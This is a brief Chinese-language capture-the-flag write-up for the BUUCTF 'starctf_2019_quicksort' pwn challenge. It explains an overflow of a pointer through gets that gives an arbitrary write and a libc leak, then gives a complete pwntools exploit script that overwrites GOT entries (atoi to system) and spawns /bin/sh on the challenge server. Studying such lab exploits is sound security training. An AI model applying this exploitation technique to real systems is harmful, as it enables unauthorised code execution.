BUU-starctf_2019_quicksort-WP
不知不觉就在factorio中颓了一天,`所以就做了这么一道不能算难的题目。
这里s可以把ptr溢出掉实现任意地址写。注意gets是读到'\n'为止的,'\x00'并不会使它停止读入。
巧合的是gets@got和free@got是相邻的,所以我们可以修改free@got的同时通过之后的printf leak出gets的地址。
exp
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = "debug")
#sh = process("./starctf_2019_quicksort")
sh = remote("node3.buuoj.cn",27373)
libc = ELF("./libcs/buu-32-libc.so")
elf = ELF('./starctf_2019_quicksort')
sh.sendlineafter("sort?\n",'2')
payload = str(0x08048816)
payload = payload.ljust(0x10,'\x00') + p32(1) + p32(1) + p32(0) + p32(elf.got["gets"])
sh.sendlineafter("number:",payload)
sh.recvuntil("result:\n")
gets_addr = int(sh.recvuntil(" \n",drop = True),base = 10)
libc_base = gets_addr - libc.symbols["gets"]
log.success("libc base:" + hex(libc_base))
system_addr = libc_base + libc.symbols["system"]
log.success("system addr:" + hex(system_addr))
sh.sendlineafter("sort?\n",'2')
payload = str(system_addr)
payload = payload.ljust(0x10,'\x00') + p32(0) + p32(0) + p32(0) + p32(elf.got["atoi"])
sh.sendlineafter("number:",payload)
sh.sendlineafter("sort?\n",'1')
sh.sendlineafter("number:","/bin/sh\x00")
sh.interactive()